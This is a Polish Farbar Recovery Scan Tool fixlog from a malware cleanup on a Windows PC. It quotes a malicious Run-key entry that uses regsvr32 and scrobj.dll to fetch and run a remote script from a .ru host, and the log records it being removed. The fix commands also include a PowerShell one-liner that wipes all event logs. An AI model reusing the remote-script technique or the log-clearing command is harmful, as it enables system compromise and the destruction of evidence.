Rezultat naprawy Farbar Recovery Scan Tool (x86) Wersja: 27-11-2017 Uruchomiony przez User (28-11-2017 19:48:28) Run:1 Uruchomiony z C:\Users\User\Desktop\FRST Załadowane profile: User (Dostępne profile: User) Tryb startu: Normal ============================================== fixlist - zawartość: ***************** CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-1293939364-4137197343-2779268670-1000\...\Run: [COM+] => regsvr32 /s /n /u /i:hxxp://server2.39slxu3bw.ru/restore.xml scrobj.dll <==== UWAGA Startup: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\u.lnk [2017-10-02] ShortcutTarget: u.lnk -> C:\Users\User\AppData\Roaming\eeYgAJnQex.exe () C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\u.lnk C:\Users\User\AppData\Roaming\eeYgAJnQex.exe FF Plugin: @microsoft.com/GENUINE -> disabled [Brak pliku] ContextMenuHandlers4: [Offline Files] -> {474C98EE-CF3D-41f5-80E3-4AAB0AB04301} => -> Brak pliku ContextMenuHandlers6: [Offline Files] -> {474C98EE-CF3D-41f5-80E3-4AAB0AB04301} => -> Brak pliku CMD: dir /a C:\Users\User\AppData\Roaming Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} EmptyTemp: ***************** Procesy zostały pomyślnie zamknięte. Punkt przywracania został pomyślnie utworzony. HKU\S-1-5-21-1293939364-4137197343-2779268670-1000\Software\Microsoft\Windows\CurrentVersion\Run\\COM+ => Wartość pomyślnie usunięto C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\u.lnk => pomyślnie przeniesiono C:\Users\User\AppData\Roaming\eeYgAJnQex.exe => pomyślnie przeniesiono "C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\u.lnk" => nie znaleziono. "C:\Users\User\AppData\Roaming\eeYgAJnQex.exe" => nie znaleziono. HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE => klucz pomyślnie usunięto HKLM\Software\Classes\Directory\ShellEx\ContextMenuHandlers\Offline Files => klucz pomyślnie usunięto HKLM\Software\Classes\CLSID\{474C98EE-CF3D-41f5-80E3-4AAB0AB04301} => klucz nie znaleziono HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\Offline Files => klucz pomyślnie usunięto HKLM\Software\Classes\CLSID\{474C98EE-CF3D-41f5-80E3-4AAB0AB04301} => klucz nie znaleziono ========= dir /a C:\Users\User\AppData\Roaming ========= Wolumin w stacji C nie ma etykiety. Numer seryjny woluminu: 6210-FEFF Katalog: C:\Users\User\AppData\Roaming 2017-11-28 19:48 . 2017-11-28 19:48 .. 2015-10-11 10:10 Adobe 2015-10-11 10:12 Ashampoo 2015-10-11 10:16 ESET 2015-10-11 08:29 Identities 2015-11-02 08:43 IDT 2015-10-11 10:17 Macromedia 2011-04-12 06:17 Media Center Programs 2016-10-01 05:57 Microsoft 2017-11-23 09:41 Mozilla 2015-10-11 10:42 MPC-HC 2015-10-11 10:39 Opera Software 2017-11-28 19:45 Skype 2016-10-01 06:11 Sun 2017-04-23 12:56 TeamViewer 2017-04-28 08:46 Umeng 2015-10-11 09:25 WinRAR 0 plik(˘w) 0 bajt˘w 18 katalog(˘w) 33˙873˙371˙136 bajt˘w wolnych ========= Koniec CMD: ========= ========= wevtutil el | Foreach-Object {wevtutil cl "$_"} ========= ========= Koniec Powershell: ========= =========== EmptyTemp: ========== BITS transfer queue => 0 B DOMStoree, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 69385946 B Java, Flash, Steam htmlcache => 744 B Windows/system/drivers => 17502821 B Edge => 0 B Chrome => 0 B Firefox => 397648886 B Opera => 384295493 B Temp, IE cache, history, cookies, recent: Users => 0 B Default => 0 B Public => 0 B ProgramData => 0 B systemprofile => 128 B LocalService => 0 B NetworkService => 2482 B User => 174902042 B Administrator => 0 B RecycleBin => 0 B EmptyTemp: => 995.4 MB danych tymczasowych Usunięto. ================================ System wymagał restartu. ==== Koniec Fixlog 19:50:06 ====